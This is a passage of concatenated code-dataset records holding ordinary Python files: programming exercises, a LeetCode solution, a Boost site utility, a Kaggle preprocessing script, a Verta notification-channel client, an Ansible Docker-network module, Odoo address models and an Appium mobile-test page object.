1\n\n    b = []\n    for i in range(len(a)):\n        if a[i] != 0:\n            b.append(a[i])\n\n    print(f'{b}, \\n{b[order_num - 1]}')\n\n# input num: 2345\ncProfile.run('simple_nums()')\n\n# 2379 function calls in 1.524 seconds\n\n# Ordered by: standard name\n#\n# ncalls tottime percall cumtime percall filename:lineno(function)\n# 1 0.000 0.000 1.524 1.524 <string>:1(<module>)\n# 1 1.523 1.523 1.524 1.524 less04_task02.py:16(simple_nums)\n# 1 0.000 0.000 1.524 1.524 {built-in method builtins.exec}\n# 1 0.000 0.000 0.000 0.000 {built-in method builtins.len}\n# 2 0.001 0.000 0.001 0.000 {built-in method builtins.print}\n# 2372 0.001 0.000 0.001 0.000 {method 'append' of 'list' objects}\n# 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects}\n\n\ncProfile.run('simple_num_ero()')\n\n# 76498 function calls in 0.020 seconds\n#\n# Ordered by: standard name\n#\n# ncalls tottime percall cumtime percall filename:lineno(function)\n# 1 0.000 0.000 0.020 0.020 <string>:1(<module>)\n# 1 0.013 0.013 0.020 0.020 less04_task02.py:31(simple_num_ero)\n# 1 0.001 0.001 0.001 0.001 less04_task02.py:34(<listcomp>)\n# 1 0.000 0.000 0.020 0.020 {built-in method builtins.exec}\n# 74119 0.004 0.000 0.004 0.000 {built-in method builtins.len}\n# 2 0.002 0.001 0.002 0.001 {built-in method builtins.print}\n# 2372 0.000 0.000 0.000 0.000 {method 'append' of 'list' objects}\n# 1 0.000 0.000 0.000 0.000 {method 'disable' of '_lsprof.Profiler' objects}\n","sub_path":"less04_task02.py","file_name":"less04_task02.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"523000435","text":"#-*- coding: utf-8 -*-\nfrom typing import List\nimport math\n\nimport time\ndef timeit(func):\n    def wrapped(*args, **kwargs):\n        start = time.time()\n        ret = func(*args, **kwargs)\n        elapsed = time.time() - start\n        
print(\"elapsed: %s\" % elapsed)\n return ret\n return wrapped\n\nclass Solution_timeexceeded:\n def rec(self, cur, n):\n if cur == n:\n return 1\n elif cur > n:\n return 0\n else:\n return self.rec(cur+1, n) + self.rec(cur+2, n)\n\n @timeit\n def climbStairs(self, n: int) -> int:\n return self.rec(0, n)\n\nfrom collections import defaultdict\nclass Solution:\n def __init__(self):\n self.cache = defaultdict(int)\n\n def rec(self, cur, n):\n if cur in self.cache: return self.cache[cur]\n if cur == n:\n self.cache[cur] = 2\n return 1\n elif cur > n:\n return 0\n else:\n step1 = self.rec(cur+1, n)\n self.cache[cur+1] = step1\n step2 = self.rec(cur+2, n)\n self.cache[cur+2] = step2\n return step1 + step2\n\n @timeit\n def climbStairs(self, n: int) -> int:\n self.cache = defaultdict(int)\n return self.rec(0, n)\n\nprint(Solution().climbStairs(2))\nprint(Solution().climbStairs(3))\nprint(Solution().climbStairs(5))\nprint(Solution().climbStairs(35))\n\n\n\n","sub_path":"lc/esy/20190818_esy_70_climbing_stairs.py","file_name":"20190818_esy_70_climbing_stairs.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"558381620","text":"#!/usr/bin/env python\n# Copyright 2011 Daniel James\n# Distributed under the Boost Software License, Version 1.0.\n# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)\n\nimport sys, re, string\n\ntry:\n from urllib.parse import urljoin\nexcept ImportError:\n from urlparse import urljoin\n\ndef htmlencode(text):\n return text.replace('&', '&').replace('<', '<').replace('>', '&rt;')\n\ndef fragment_to_string(fragment):\n \"\"\"\n Convert a minidom document fragment to a string.\n\n Because 'toxml' doesn't work:\n http://bugs.python.org/issue9883\n \"\"\"\n x = ''.join(x.toxml('utf-8').decode('utf-8') for x in fragment.childNodes)\n return re.compile(r' +$', flags = re.M).sub('', x)\n\ndef base_links(node, base_link):\n transform_links(node, lambda x: urljoin(base_link, x))\n\ndef transform_links(node, func):\n transform_links_impl(node, 'a', 'href', func)\n transform_links_impl(node, 'img', 'src', func)\n\ndef transform_links_impl(node, tag_name, attribute, func):\n if node.nodeType == node.ELEMENT_NODE or \\\n node.nodeType == node.DOCUMENT_NODE:\n for x in node.getElementsByTagName(tag_name):\n x.setAttribute(attribute, func(x.getAttribute(attribute)))\n elif node.nodeType == node.DOCUMENT_FRAGMENT_NODE:\n for x in node.childNodes:\n transform_links_impl(x, tag_name, attribute, func)\n\ndef write_template(dst_path, template_path, data):\n file = open(template_path)\n if sys.version_info < (3, 0):\n s = string.Template(file.read().decode('utf-8'))\n else:\n s = string.Template(file.read())\n output = s.substitute(data)\n output = re.compile(r' +$', flags = re.M).sub('', output)\n out = open(dst_path, 'w')\n if sys.version_info < (3, 0):\n out.write(output.encode('utf-8'))\n else:\n out.write(output)\n\ndef write_py_template(dst_path, template_path, data):\n data['emit'] = Emitter()\n exec(open(template_path).read(), {}, data)\n\n out = open(dst_path, 'w')\n if sys.version_info < (3, 0):\n out.write(data['emit'].output.encode('utf-8'))\n else:\n out.write(data['emit'].output)\n\nclass Emitter:\n def __init__(self):\n self.output = ''\n\n def __call__(self, x):\n self.output += 
x\n","sub_path":"site-tools/boost_site/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"315225420","text":"from __future__ import print_function\nimport utils.conf as conf\nimport pandas as pd\nfrom sklearn import preprocessing\n\n\ndef read_data():\n train = pd.read_csv(conf.train_data_path, sep=',')\n test = pd.read_csv(conf.test_data_path, sep=',')\n return train, test\n\n\ndef impute(df):\n df['Upc'] = df.fillna(0)\n df['FinelineNumber'] = df['FinelineNumber'].fillna(-1).astype('int')\n\n\n# Encode categorical variables\ndef encode(df, columns, col=None, dict=None):\n # Auto encoding\n for col_name in columns:\n le = preprocessing.LabelEncoder()\n le.fit(df[col_name])\n df['Encoded_' + col_name] = le.transform(df[col_name])\n\n # encode by dictionary\n if (col is not None) & (dict is not None):\n for key, value in dict.items():\n df[col].replace(key, value, inplace=True)\n df['Encoded_' + col] = df[col]\n\n\ndef clean():\n train, test = read_data()\n impute(train)\n impute(test)\n wd_dict = {'Monday': 1, 'Tuesday': 2, 'Wednesday': 3, 'Thursday': 4, 'Friday': 5, 'Saturday': 6, 'Sunday': 7}\n encode(train, ['DepartmentDescription', 'Upc'], col='Weekday', dict=wd_dict)\n encode(test, ['DepartmentDescription', 'Upc'], col='Weekday', dict=wd_dict)\n train.drop(['Weekday', 'Upc', 'DepartmentDescription'], axis=1, inplace=True)\n test.drop(['Weekday', 'Upc', 'DepartmentDescription'], axis=1, inplace=True)\n return train, test\n","sub_path":"kaggle/modelers/wh/codebase/preprocessing/data_cleaner.py","file_name":"data_cleaner.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"444407960","text":"# Write a Python program to count number of digits in a number.\n\nn = int(input(\"Please enter a number: \"))\ndivisor = 10\ncount = 1\n\nwhile n % divisor != n:\n count = count + 1\n divisor = divisor * 10\n\nprint(\"Digit(s) in the given number {0} is/are {1}\".format(n, count))\n","sub_path":"assignments-2/printDigitCount.py","file_name":"printDigitCount.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"621165305","text":"# -*- coding: utf-8 -*-\n\nimport warnings\n\nfrom ....._protos.public.monitoring import Alert_pb2 as _AlertService\nfrom ....._internal_utils import _utils, time_utils\nfrom ....._tracking import entity, _Context\nfrom ... import utils\n\n\nclass NotificationChannel(entity._ModelDBEntity):\n \"\"\"\n A notification channel persisted to Verta.\n\n A notification channel directs a triggered alert to propagate a message to\n some destination to notify interested parties.\n\n Attributes\n ----------\n id : int\n ID of this notification channel.\n name : str\n Name of this notification channel.\n\n Examples\n --------\n .. 
code-block:: python\n\n        from verta.operations.monitoring.notification_channel import SlackNotificationChannel\n\n        channels = Client().operations.notification_channels\n        channel = channels.create(\n            \"Slack alerts\",\n            SlackNotificationChannel(\"https://hooks.slack.com/services/.../.../......\"),\n        )\n\n        alert = monitored_entity.alerts.create(\n            name=\"MSE\",\n            alerter=alerter,\n            summary_sample_query=sample_query,\n            notification_channels=[channel],\n        )\n\n    \"\"\"\n\n    def __init__(self, conn, conf, msg):\n        super(NotificationChannel, self).__init__(\n            conn,\n            conf,\n            _AlertService,\n            \"alerts\",\n            msg,\n        )\n\n    def __repr__(self):\n        self._refresh_cache()\n        msg = self._msg\n        return \"\\n\\t\".join(\n            (\n                \"Notification Channel\",\n                \"name: {}\".format(msg.name),\n                \"id: {}\".format(msg.id),\n                \"created: {}\".format(_utils.timestamp_to_str(msg.created_at_millis)),\n                \"updated: {}\".format(_utils.timestamp_to_str(msg.updated_at_millis)),\n                \"channel: {}\".format(\n                    # TODO: use a `channel` property that returns the actual class\n                    _AlertService.NotificationChannelTypeEnum.NotificationChannelType.Name(\n                        msg.type\n                    )\n                ),\n            )\n        )\n\n    @property\n    def name(self):\n        self._refresh_cache()\n\n        return self._msg.name\n\n    @classmethod\n    def _get_proto_by_id(cls, conn, id):\n        msg = _AlertService.FindNotificationChannelRequest(\n            ids=[int(id)], page_number=1, page_limit=-1,\n        )\n        endpoint = \"/api/v1/alerts/findNotificationChannel\"\n        response = conn.make_proto_request(\"POST\", endpoint, body=msg)\n        channels = conn.must_proto_response(response, msg.Response).channels\n        if len(channels) > 1:\n            warnings.warn(\n                \"unexpectedly found multiple notification channels with\"\n                \" the same ID\"\n            )\n        return channels[0]\n\n    @classmethod\n    def _get_proto_by_name(cls, conn, name, workspace):\n        # NOTE: workspace is currently unsupported until https://vertaai.atlassian.net/browse/VR-9792\n        msg = _AlertService.FindNotificationChannelRequest(\n            names=[name], page_number=1, page_limit=-1,\n        )\n        endpoint = \"/api/v1/alerts/findNotificationChannel\"\n        response = conn.make_proto_request(\"POST\", endpoint, body=msg)\n        channels = conn.must_proto_response(response, msg.Response).channels\n        if len(channels) > 1:\n            warnings.warn(\n                \"unexpectedly found multiple notification channels with\"\n                \" the same name\"\n            )\n        return channels[0]\n\n    @classmethod\n    def _create_proto_internal(\n        cls,\n        conn,\n        ctx,\n        name,\n        channel,\n        created_at_millis,\n        updated_at_millis,\n    ):\n        msg = _AlertService.CreateNotificationChannelRequest(\n            channel=_AlertService.NotificationChannel(\n                name=name,\n                created_at_millis=created_at_millis,\n                updated_at_millis=updated_at_millis,\n                type=channel._TYPE,\n            )\n        )\n        if msg.channel.type == _AlertService.NotificationChannelTypeEnum.SLACK:\n            msg.channel.slack_webhook.CopyFrom(channel._as_proto())\n        else:\n            raise ValueError(\n                \"unrecognized notification channel type enum value {}\".format(\n                    msg.channel.type\n                )\n            )\n\n        endpoint = \"/api/v1/alerts/createNotificationChannel\"\n        response = conn.make_proto_request(\"POST\", endpoint, body=msg)\n        notification_channel_msg = conn.must_proto_response(\n            response,\n            _AlertService.NotificationChannel,\n        )\n        return notification_channel_msg\n\n    def _update(self):\n        raise NotImplementedError\n\n    def delete(self):\n        \"\"\"\n        Delete this notification channel.\n\n        Returns\n        -------\n        bool\n            ``True`` if the delete was successful.\n\n        Raises\n        ------\n        :class:`requests.HTTPError`\n            If the delete failed.\n\n        \"\"\"\n        msg = 
_AlertService.DeleteNotificationChannelRequest(ids=[self.id])\n        endpoint = \"/api/v1/alerts/deleteNotificationChannel\"\n        response = self._conn.make_proto_request(\"DELETE\", endpoint, body=msg)\n        self._conn.must_response(response)\n        return True\n\n\nclass NotificationChannels(object):\n    \"\"\"\n    Collection object for creating and finding notification channels.\n\n    Examples\n    --------\n    .. code-block:: python\n\n        channels = Client().operations.notification_channels\n\n    \"\"\"\n\n    def __init__(self, conn, conf):\n        self._conn = conn\n        self._conf = conf\n\n    def create(\n        self,\n        name,\n        channel,\n        created_at=None,\n        updated_at=None,\n    ):\n        \"\"\"\n        Create a new notification channel.\n\n        Parameters\n        ----------\n        name : str\n            A unique name for this notification channel.\n        channel : :class:`verta.operations.monitoring.notification_channel._NotificationChannel`\n            The configuration for this notification channel.\n        created_at : datetime.datetime or int, optional\n            An override creation time to assign to this channel. Either a\n            timezone aware datetime object or unix epoch milliseconds.\n        updated_at : datetime.datetime or int, optional\n            An override update time to assign to this channel. Either a\n            timezone aware datetime object or unix epoch milliseconds.\n\n        Returns\n        -------\n        :class:`NotificationChannel`\n            Notification channel.\n\n        Examples\n        --------\n        .. code-block:: python\n\n            from verta.operations.monitoring.notification_channel import SlackNotificationChannel\n\n            channels = Client().operations.notification_channels\n\n            channel = channels.create(\n                \"Slack alerts\",\n                SlackNotificationChannel(\"https://hooks.slack.com/services/.../.../......\"),\n            )\n\n        \"\"\"\n        ctx = _Context(self._conn, self._conf)\n        return NotificationChannel._create(\n            self._conn,\n            self._conf,\n            ctx,\n            name=name,\n            channel=channel,\n            created_at_millis=time_utils.epoch_millis(created_at),\n            updated_at_millis=time_utils.epoch_millis(updated_at),\n        )\n\n    def get(self, name=None, id=None):\n        \"\"\"\n        Get an existing notification channel.\n\n        Either `name` or `id` can be provided but not both.\n\n        Parameters\n        ----------\n        name : str, optional\n            Notification channel name.\n        id : int, optional\n            Notification channel ID.\n\n        Returns\n        -------\n        :class:`NotificationChannel`\n            Notification channel.\n\n        \"\"\"\n        if name and id:\n            raise ValueError(\"cannot specify both `name` and `id`\")\n        elif name:\n            return NotificationChannel._get_by_name(\n                self._conn,\n                self._conf,\n                name,\n                None,  # TODO: pass workspace instead of None\n            )\n        elif id:\n            return NotificationChannel._get_by_id(self._conn, self._conf, id)\n        else:\n            raise ValueError(\"must specify either `name` or `id`\")\n\n    # TODO: use lazy list and pagination\n    # TODO: a proper find\n    def list(self):\n        \"\"\"\n        Return all accessible notification channels.\n\n        Returns\n        -------\n        list of :class:`NotificationChannel`\n            Notification channels.\n\n        \"\"\"\n        msg = _AlertService.FindNotificationChannelRequest(\n            page_number=1, page_limit=-1,\n        )\n        endpoint = \"/api/v1/alerts/findNotificationChannel\"\n        response = self._conn.make_proto_request(\"POST\", endpoint, body=msg)\n        channels = self._conn.must_proto_response(response, msg.Response).channels\n        return [\n            NotificationChannel(self._conn, self._conf, channel) for channel in channels\n        ]\n\n    def delete(self, channels):\n        \"\"\"\n        Delete the given notification channels in a single request.\n\n        Parameters\n        ----------\n        channels : list of :class:`NotificationChannel`\n            Notification channels.\n\n        Returns\n        -------\n        bool\n            ``True`` if 
the delete was successful.\n\n Raises\n ------\n :class:`requests.HTTPError`\n If the delete failed.\n\n \"\"\"\n channel_ids = utils.extract_ids(channels)\n msg = _AlertService.DeleteNotificationChannelRequest(ids=channel_ids)\n endpoint = \"/api/v1/alerts/deleteNotificationChannel\"\n response = self._conn.make_proto_request(\"DELETE\", endpoint, body=msg)\n self._conn.must_response(response)\n return True\n","sub_path":"client/verta/verta/operations/monitoring/notification_channel/_entities/notification_channel.py","file_name":"notification_channel.py","file_ext":"py","file_size_in_byte":9860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"586578836","text":"#!/usr/bin/env python\n\nfrom subprocess import Popen, PIPE\nimport json\nfrom ansible.module_utils.basic import *\n\nmodule = AnsibleModule(\n argument_spec=dict(\n app=dict(required=True),\n proc=dict(required=True),\n instance_number=dict(required=True),\n )\n)\n\n\ndef main():\n appname = module.params['app']\n procname = module.params['proc']\n instance_no = module.params['instance_number']\n\n try:\n network_info = get_network_info(appname)\n network_id = get_network_id(network_info)\n endpoint_id, container_ip = get_endpoint_info(\n network_info, procname, instance_no)\n module.exit_json(changed=False, network_id=network_id,\n endpoint_id=endpoint_id, recycle_ip=container_ip)\n except Exception as e:\n module.fail_json(msg=str(e))\n\n\ndef get_network_info(appname):\n p = Popen(['docker', 'network', 'inspect', appname],\n stdout=PIPE, stderr=PIPE)\n output, err = p.communicate()\n if p.returncode != 0:\n module.fail_json(msg=err)\n return json.loads(output.rstrip())\n\n\ndef get_network_id(network_info):\n return network_info[0]['Id']\n\n\ndef get_endpoint_info(network_info, procname, instance_no):\n containers_info = network_info[0]['Containers']\n endpoint_id, container_ip = None, None\n for k, v in containers_info.iteritems():\n container_name = v['Name']\n if match_proc_instance(container_name, procname, instance_no):\n endpoint_id = v['EndpointID']\n container_ip = v['IPv4Address'] # the format of ip is 'x.x.x.x/32'\n return endpoint_id, container_ip[0:len(container_ip) - 3]\n\n\n# container name should include procname and instance no\ndef match_proc_instance(name, procname, instance_no):\n instance_filter = '-i' + instance_no + '-'\n return procname in name and instance_filter in name\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"playbooks/roles/libraries/library/inspect_docker_network.py","file_name":"inspect_docker_network.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"274995848","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _,exceptions\n\nclass ResStateCity(models.Model):\n _name = 'res.state.city'\n _description = 'City'\n\n state_id = fields.Many2one('res.country.state',string='State')\n name = fields.Char('City')\n code = fields.Char('City Code')\n area_ids = fields.One2many('res.city.area','city_id',string='Area')\n\nclass ResCityArea(models.Model):\n _name = 'res.city.area'\n _description = 'Area'\n\n city_id = fields.Many2one('res.state.city',string='City')\n name = fields.Char('Area')\n code = fields.Char('Area Code')\n\nclass ResCountryState(models.Model):\n _inherit = 'res.country.state'\n\n city_ids = fields.One2many('res.state.city','state_id',string='City')\n base_city_ids = 
fields.One2many('res.city','state_id',string='City')\n\n\n","sub_path":"e2yun_addons/odoo12/e2yun_srm_partner_address/models/res_state_city.py","file_name":"res_state_city.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"50263269","text":"import traceback\n\nfrom appium.webdriver.common.mobileby import MobileBy\nfrom library.core.TestLogger import TestLogger\nfrom pages.components.BaseChat import BaseChatPage\nimport time\n\n\n# noinspection PyBroadException\nclass GroupChatPage(BaseChatPage):\n \"\"\"群聊天页面\"\"\"\n ACTIVITY = 'com.cmcc.cmrcs.android.ui.activities.MessageDetailActivity'\n\n __locators = {'': (MobileBy.ACCESSIBILITY_ID, ''),\n '说点什么': (MobileBy.XPATH, '//XCUIElementTypeOther[3]/XCUIElementTypeTextView'),\n '聊天列表': (MobileBy.XPATH, '//XCUIElementTypeApplication[@name=\"和飞信\"]/XCUIElementTypeWindow[1]/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeTable/XCUIElementTypeCell'),\n '返回': (MobileBy.ACCESSIBILITY_ID, 'back'),\n\n '消息免打扰': (MobileBy.ACCESSIBILITY_ID, 'chat_list_nodisturb'),\n '多方通话': (MobileBy.ACCESSIBILITY_ID, 'cc chat message groupcall norm'),\n '设置': (MobileBy.IOS_PREDICATE, 'name == \"cc chat message site normal\"'),\n '删除群成员确定按钮': (MobileBy.XPATH, '(//XCUIElementTypeButton[@name=\"确定(1)\"])[2]'),\n '添加群成员按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_groupchat_add_normal\"'),\n '删除群成员按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_groupchat_delete_normal\"'),\n '添加群成员确定按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"确定\"'),\n '图片元素数量': (MobileBy.IOS_PREDICATE, 'type==\"XCUIElementTypeImage\"'),\n '群消息免打扰按钮': (MobileBy.XPATH, '//XCUIElementTypeSwitch[@name=\"群消息免打扰\"]'),\n '群名称': (MobileBy.IOS_PREDICATE, 'name == \"群名称\"'),\n '群管理': (MobileBy.IOS_PREDICATE, 'name == \"群管理\"'),\n '解散群': (MobileBy.IOS_PREDICATE, 'name == \"解散群\"'),\n '解散按钮': (MobileBy.IOS_PREDICATE, 'name == \"解散\"'),\n '我的群昵称': (MobileBy.IOS_PREDICATE, 'name == \"我的群昵称\"'),\n '我的群昵称输入框': (MobileBy.XPATH, '//XCUIElementTypeOther/XCUIElementTypeTextField'),\n '修改群名称输入框': (MobileBy.IOS_PREDICATE, 'type == \"XCUIElementTypeTextField\"'),\n '修改群名称完成按钮': (MobileBy.IOS_PREDICATE, 'name == \"完成\"'),\n '选择手机联系人': (MobileBy.IOS_PREDICATE, 'name == \"选择手机联系人\"'),\n '修改群名称清除文本按钮': (MobileBy.IOS_PREDICATE, 'name == \"清除文本\"'),\n\n '14:58': (MobileBy.ID, 'com.chinasofti.rcs:id/tv_time'),\n 'frank': (MobileBy.ID, 'com.chinasofti.rcs:id/text_name'),\n '[呲牙1]': (MobileBy.ID, 'com.chinasofti.rcs:id/tv_message'),\n 'com.chinasofti.rcs:id/svd_head': (MobileBy.ID, 'com.chinasofti.rcs:id/svd_head'),\n '呵呵': (MobileBy.ID, 'com.chinasofti.rcs:id/tv_message'),\n 'mobile0489': (MobileBy.ID, 'com.chinasofti.rcs:id/text_name'),\n 'APP test': (MobileBy.ID, 'com.chinasofti.rcs:id/tv_message'),\n '选择名片': (MobileBy.IOS_PREDICATE, 'name == \"cc_chat_input_ic_business\"'),\n '更多': (MobileBy.ID, 'com.chinasofti.rcs:id/ib_more'),\n '文件发送成功标志': (MobileBy.ID, 'com.chinasofti.rcs:id/img_message_down_file'),\n '选择照片': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_gallery_normal\"'),\n '富媒体拍照': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_camera_normal\"'),\n '发送失败标识': (MobileBy.ID, 'com.chinasofti.rcs:id/imageview_msg_send_failed'),\n '消息图片': (MobileBy.ID, 'com.chinasofti.rcs:id/imageview_msg_image'),\n '消息视频': (MobileBy.ID, 'com.chinasofti.rcs:id/textview_video_time'),\n '收藏': (MobileBy.XPATH, 
\"//*[contains(@text, '收藏')]\"),\n '转发': (MobileBy.XPATH, \"//*[contains(@text, '转发')]\"),\n '删除': (MobileBy.XPATH, \"//*[contains(@text, '删除')]\"),\n '撤回': (MobileBy.XPATH, \"//*[contains(@text, '撤回')]\"),\n '多选': (MobileBy.XPATH, \"//*[contains(@text, '多选')]\"),\n '复制': (MobileBy.XPATH, \"//*[contains(@text, '复制')]\"),\n '收藏_c': (MobileBy.IOS_PREDICATE, \"name=='收藏'\"),\n '转发_c': (MobileBy.IOS_PREDICATE, \"name=='转发'\"),\n '删除_c': (MobileBy.IOS_PREDICATE, \"name=='删除'\"),\n '撤回_c': (MobileBy.IOS_PREDICATE, \"name=='撤回'\"),\n '多选_c': (MobileBy.IOS_PREDICATE, \"name=='多选'\"),\n '复制_c': (MobileBy.IOS_PREDICATE, \"name=='复制'\"),\n '我知道了': (MobileBy.ID, 'com.chinasofti.rcs:id/dialog_btn_ok'),\n '勾': (MobileBy.ID, 'com.chinasofti.rcs:id/img_message_down_file'),\n '重发按钮': (MobileBy.XPATH, '//XCUIElementTypeButton[@name=\"cc chat again send normal\"]'),\n '重发消息确定': (MobileBy.ID, 'com.chinasofti.rcs:id/btn_ok'),\n '语音消息体': (MobileBy.ID, 'com.chinasofti.rcs:id/img_audio_play_icon'),\n '位置返回': (MobileBy.ID, 'com.chinasofti.rcs:id/location_back_btn'),\n '表情按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_icon_emoji_normal\"'),\n '微笑表情': (MobileBy.IOS_PREDICATE, 'name == \"{awx\"'),\n '窃喜表情': (MobileBy.IOS_PREDICATE, 'name == \"{aqx\"'),\n '流鼻涕表情': (MobileBy.IOS_PREDICATE, 'name == \"{albt\"'),\n '更多加号按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_ic_input_more\"'),\n '更多关闭按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_ic_input_close\"'),\n '语音按钮': (MobileBy.IOS_PREDICATE, 'name contains \"cc chat voice normal\"'),\n '退出按钮': (MobileBy.IOS_PREDICATE, 'name == \"退出\"'),\n '发送按钮': (MobileBy.IOS_PREDICATE, 'name contains \"cc chat send normal\"'),\n 'GIF按钮': (MobileBy.IOS_PREDICATE, 'name == \"{gif\"'),\n 'gif图片': (MobileBy.XPATH,\n '//*[@name=\"cc chat gif close\"]/../following-sibling::*[1]/XCUIElementTypeCell/XCUIElementTypeOther/XCUIElementTypeImage'),\n '关闭GIF按钮': (MobileBy.IOS_PREDICATE, 'name == \"cc chat gif close\"'),\n '文件按钮': (MobileBy.IOS_PREDICATE, 'name CONTAINS \"cc_chat_icon_file_normal\"'),\n '表��页': (MobileBy.ID, 'com.chinasofti.rcs:id/gv_expression'),\n '表情': (MobileBy.ID, 'com.chinasofti.rcs:id/iv_expression_image'),\n '输入框': (MobileBy.IOS_PREDICATE, 'type==\"XCUIElementTypeTextView\"'),\n '视频播放按钮': (MobileBy.IOS_PREDICATE, 'name contains \"cc chat play\"'),\n '关闭表情页': (MobileBy.ID, 'com.chinasofti.rcs:id/ib_expression_keyboard'),\n '多选返回': (MobileBy.ID, 'com.chinasofti.rcs:id/back_arrow'),\n '多选计数': (MobileBy.ID, 'com.chinasofti.rcs:id/tv_count'),\n '多选选择框': (MobileBy.ID, 'com.chinasofti.rcs:id/multi_check'),\n '多选删除': (MobileBy.ID, 'com.chinasofti.rcs:id/multi_btn_delete'),\n '多选转发': (MobileBy.ID, 'com.chinasofti.rcs:id/multi_btn_forward'),\n '删除已选信息': (MobileBy.ID, 'com.chinasofti.rcs:id/btn_ok'),\n '取消删除已选信息': (MobileBy.ID, 'com.chinasofti.rcs:id/btn_cancel'),\n \"返回上一级\": (MobileBy.ID, \"com.chinasofti.rcs:id/left_back\"),\n \"文本发送按钮\": (MobileBy.ID, \"com.chinasofti.rcs:id/ib_send\"),\n \"语音小红点\": (MobileBy.ID, \"com.chinasofti.rcs:id/ib_record_red_dot\"),\n \"粘贴\": (MobileBy.ID, \"com.chinasofti.rcs:id/ib_pic\"),\n \"照片选择框\": (MobileBy.ID, \"com.chinasofti.rcs:id/iv_select\"),\n \"更多小红点\": (MobileBy.ID, \"com.chinasofti.rcs:id/id_more_red_dot\"),\n \"预览文件_返回\": (MobileBy.ID, 'com.chinasofti.rcs:id/back'),\n '预览文件_更多': (MobileBy.ID, 'com.chinasofti.rcs:id/menu'),\n '定位_地图': ('id', 'com.chinasofti.rcs:id/location_info_view'),\n '始终允许': (MobileBy.XPATH, \"//*[contains(@text, '始终允许')]\"),\n '小键盘麦克标志': (MobileBy.IOS_PREDICATE, 'name == \"dictation\"'),\n 
'文本消息': (MobileBy.XPATH,\n \"//XCUIElementTypeCell/XCUIElementTypeOther/XCUIElementTypeImage/XCUIElementTypeOther\"),\n '最后一条文本消息': (MobileBy.XPATH,\n \"//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeOther/XCUIElementTypeImage/XCUIElementTypeOther\"),\n '最后一条文本消息_c': (MobileBy.XPATH, \"//XCUIElementTypeTable[1]/XCUIElementTypeCell[last()]\"),\n '消息记录': (MobileBy.XPATH, '//XCUIElementTypeTable/XCUIElementTypeCell'),\n '最后一条表情消息的表情': (MobileBy.XPATH,\n '(//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeOther/XCUIElementTypeImage/XCUIElementTypeOther/XCUIElementTypeImage[@name])[last()]'),\n '最后一条消息记录发送失败标识': (MobileBy.XPATH,\n '//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeButton[contains(@name,\"cc chat again send normal\")]'),\n '最后一条消息记录已读动态': (MobileBy.XPATH, '//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeButton[not(@name)]'),\n '多选关闭按钮': (MobileBy.IOS_PREDICATE, 'name==\"cc chat checkbox close\"'),\n '多选删除按钮': (MobileBy.IOS_PREDICATE, 'name==\"cc chat checkbox delete normal\"'),\n '多选转发按钮': (MobileBy.IOS_PREDICATE, 'name==\"cc chat checkbox forward norma\"'),\n '已选择': (MobileBy.IOS_PREDICATE, 'name==\"已选择\"'),\n '未选择': (MobileBy.IOS_PREDICATE, 'name==\"未选择\"'),\n '已选择数量': (MobileBy.XPATH, '//*[@name=\"已选择\"]/following-sibling::XCUIElementTypeStaticText[1]'),\n '多选最后一条消息勾选框': (\n MobileBy.XPATH, '//XCUIElementTypeTable/XCUIElementTypeCell[last()]/XCUIElementTypeButton[2]'),\n '群短信': (MobileBy.ACCESSIBILITY_ID, 'cc_chat_input_ic_groupmassage'),\n '群人数文本': (MobileBy.XPATH,\n '//*[@name=\"back\"]/../following-sibling::XCUIElementTypeOther[1]/XCUIElementTypeOther/XCUIElementTypeStaticText[2]'),\n '我的电脑-聊天记录': (MobileBy.XPATH,\n '//XCUIElementTypeApplication[@name=\"和飞信\"]/XCUIElementTypeWindow[1]/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeOther/XCUIElementTypeTable/XCUIElementTypeCell/XCUIElementTypeOther/XCUIElementTypeImage[1]/XCUIElementTypeOther'),\n }\n\n @TestLogger.log()\n def make_sure_chatwindow_have_message(self, content='文本消息', times=1):\n \"\"\"确保当前页面有文本消息记录\"\"\"\n if self.is_element_present_message():\n time.sleep(3)\n else:\n while times > 0:\n times = times - 1\n self.click_input_box()\n self.input_message_text(content)\n self.click_send_button()\n self.click_input_box()\n self.input_message_text(content)\n self.click_send_button()\n time.sleep(2)\n\n 